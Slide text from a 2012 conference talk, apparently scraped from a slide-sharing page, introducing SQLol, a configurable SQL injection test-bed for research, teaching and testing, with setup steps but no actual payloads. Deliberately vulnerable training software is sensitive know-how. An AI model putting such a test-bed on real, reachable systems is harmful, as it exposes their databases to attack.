Upload
baronzor
View
1.501
Download
0
Tags:
Embed Size (px)
DESCRIPTION
The slides from my SOURCE Boston 2012 talk: Advanced SQL Injection with SQLol
Citation preview
COPYRIGHT TRUSTWAVE 2011
Presented by:
Advanced SQL Injection with SQLol
Daniel Crowley
COPYRIGHT TRUSTWAVE 2011
SQLolA configurable SQLi test-bedA tool for
ResearchEducationTesting
http://github.com/SpiderLabs/SQLol
What?
COPYRIGHT TRUSTWAVE 2011
Existing test-beds areInflexibleSimplified
Real-world scenarios areVariedDangerous
Why?
COPYRIGHT TRUSTWAVE 2011
Heghlu'meH QaQ jajvam
Why? Klingon version
COPYRIGHT TRUSTWAVE 2011
I humbly posit that the current state(With much respect to work which does precede)Of test-beds made with vulns to
demonstrateIs lacking some in flexibility.
Why? Shakespearean version
COPYRIGHT TRUSTWAVE 2011
Two options are presented present-day,As far as when one deals with SQL:A blind injection (bool or time delay)And UNION statement hax (oh gee, how swell…)
Why? Shakespearean version
COPYRIGHT TRUSTWAVE 2011
Imagine we could choose how queries readAnd how our input sanitizes, oh!How nimble and specific we could beTo recreate our ‘sploit scenarios.
Why? Shakespearean version
COPYRIGHT TRUSTWAVE 2011
And thus is S-Q-L-O-L conceived:That we can study how to pwn DBs.
Why? Shakespearean version
COPYRIGHT TRUSTWAVE 2011
‘Cuz.
Why? tl;dr version
AIMSelecting flaw configuration
COPYRIGHT TRUSTWAVE 2011
Choose type of query
COPYRIGHT TRUSTWAVE 2011
Choose sanitization options
COPYRIGHT TRUSTWAVE 2011
Choose verbosity
COPYRIGHT TRUSTWAVE 2011
Challenges
FIREManual and automated exploitation
COPYRIGHT TRUSTWAVE 2011
Manual
COPYRIGHT TRUSTWAVE 2011
Manual
COPYRIGHT TRUSTWAVE 2011
Automated
DEMONSTRATION?HOW ABOUT A
MAKE THE MAGIC HAPPENDeploying SQLol
COPYRIGHT TRUSTWAVE 2011
Web server of your choicewith PHP
ADODB-supported database
Requirements
COPYRIGHT TRUSTWAVE 2011
Un-tar SQLol inside web root
Deployment
COPYRIGHT TRUSTWAVE 2011
Modify includes/database.config.php
Deployment
COPYRIGHT TRUSTWAVE 2011
Run database reset script
Deployment
COPYRIGHT TRUSTWAVE 2011
Custom sanitization routinesStored procedure injectionsDatabase privilege optionsMore challenges
Future features
COPYRIGHT TRUSTWAVE 2011
Try XMLmao!Possible future test beds?
cryptOMGrofLDAP (asLDAP)KTHXbypassXSSmh
Like SQLol?
COPYRIGHT TRUSTWAVE 2011
[email protected]: @dan_crowley
Code:http://github.com/SpiderLabs/SQLol
http://www.surveymonkey.com/sourceboston12
Questions?